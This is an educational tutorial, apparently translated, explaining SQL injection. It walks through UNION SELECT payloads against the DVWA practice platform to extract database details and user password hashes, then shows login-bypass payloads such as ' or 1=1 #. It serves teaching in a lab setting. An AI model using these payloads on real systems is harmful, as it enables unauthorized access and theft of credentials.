1. Introduction to SQL Injection
SQL injection attack is an attack by inserting malicious SQL queries or additional statements into the input parameters of the application, and then parsing and executing them on the background SQL server. It is currently one of the most common means used by hackers to attack databases.
2. Three-tier architecture of Web program
Three-tier architecture (
3-tier architecture) usually divides the entire business application into:
User Interface layer
Business Logic Layer
Data access layer
The purpose of distinguishing levels is the idea of "high cohesion and low coupling". In software architecture design, the hierarchical structure is the most common and important structure and is used in many types of software development.
2.2. Database Web three-tier architecture
Because database-driven Web applications follow the idea of a three-tier architecture, they are also divided into three layers:
Presentation layer.
Business logic layer (also called domain layer)
Data access layer (also called storage layer)
3. Detailed explanation of SQL injection vulnerabilities
3.2 Causes and threats of SQL injection:
As mentioned just now, when we access a dynamic web page, the web server will initiate a SQL query request to the data access layer. If the permission verification is passed, the SQL statement will be executed.
Sql requests sent directly within the website are generally not dangerous, but the actual situation is that many times it is necessary to dynamically construct SQL statements based on the user's input data. If the data entered by the user is constructed into malicious SQL code, the web application has not processed the dynamic Examining the parameters used in constructed SQL statements will bring unexpected dangers.
The threats brought by SQL injection mainly include the following points:
- Guessing the backend database is the most commonly used method to steal sensitive information from websites.
- Bypass authentication, such as bypassing verification to log into the website backend.
- Injection can use database stored procedures to perform privilege escalation and other operations.
4. SQL injection example 1. Guess the database pass
Let's take an example to give you a clearer understanding of how SQL injection occurs in the database.
One thing to note here: remember that the injection experiment must be conducted in an environment, and SQL injection cannot be performed on domestic websites, otherwise the police will come to your door, so be careful to prevent contact with the law.
Use the DVWA penetration testing platform as the target of attack testing:
Enter "1" in the user ID and check the echo (user ID = 1, indicating that the PHP page passes parameters through the get method):
Click to view the source code , here we can see the SQL injection source
The SQL query code is:
As you can see, the actual executed SQL statement is:
SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;'The meaning of this statement is to query the data with user_id 1 in the users table and rank it by the first field.
It can be seen that there are only two fields in the users table and the data is in two columns.
Next we use union select joint query to continue to obtain information.
The union operator can combine the query result sets of two or more select statements into one result set for display, that is, perform a union query. It should be noted that when using union query, the number of columns needs to be the same as that of the main query. We have already known that the number of columns of the main query is 2, so it will be easy to handle next.
Enter 1' union select database(),user()# to query:
- database() will return the database name used by the current website.
- user() will return the username executing the current query.
In fact, the actual SQL statement executed is:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user()#`;
By returning the information in the above picture, we successfully obtained:
- The current database used by the website is dvwa.
- The user name currently executing the query is root@localhost.
In the same way, we enter again
1' union select version(),@@version_compile_os#to query:
- version() gets the current database version.
- @@version_compile_os Get the current operating system.
SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#`;
By returning the information in the above picture, we successfully obtained:
- The current database version is: 5.6.31-0ubuntu0.15.10.1.
- The current operating system is: debian-linux-gnu
Next we try to get the table name in the dvwa database.
information_schema is a table that comes with mysql. This data table saves the information of all databases in the Mysql server, such as database name, database tables, table column data types and access rights, etc. The database has a data table named tables, which contains two fields table_name and table_schema, respectively recording the table name stored in the DBMS and the database where the table name is located.
We enter 1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'# to query:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#`;
The dvwa database has two data tables, namely guestbook and users.
If we are not satisfied with obtaining information, we can try to obtain the account number and password next.
The fields of the users table are user and password, so enter:
1' union select user,password from users#to query:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#`;
You can see that the username and password were successfully exposed. The password is encrypted using md5 and can be decrypted at http://www.cmd5.com . Now you should have some understanding of SQL injection, and also understand the power of SQL injection, right? So, as I said before, be aware that experiments are experiments, but don’t break the law.
4.2SQL injection example 2. Bypassing verification
Examples of using SQL vulnerabilities to bypass login verification
Use a pre-written page, which is a normal login page. Just enter the correct username and password to log in successfully.
If we find that we can't log in, we can find that we can't get any information from the error page.
When the query finds that both username and password fields exist in the data table, a successful login will be returned.
Following the idea of the first example, we try to enter the username123' or 1=1 #and password as well123' or 1=1 #:
Why can I log in successfully? Because the actual executed statement is:
select * from users where username='123' or 1=1 #' and password='123' or 1=1 #'
According to Mysql syntax, the content after # will be ignored, so the above statement is equivalent to (in fact, it is the same if you don’t enter anything in the password box):
select * from users where username='123' or 1=1
Since the judgment statement or 1=1 is always true, the result of course returns true and the login is successful.
Let's try not to use # to block the single quotes, and use manual closing:
we try to enter the user name123' or '1'='1, and enter the password similarly123' or '1'='1(the single quotes cannot be missing, otherwise there will be a syntax error)
The actual SQL statement executed is:
select * from users where username='123' or '1'='1' and password='123' or '1'='1The two or statements make the two judgments before and always equal to true, so you can log in successfully.
There are many other Mysql statements that can cleverly bypass verification, and you can use your own thinking to try them.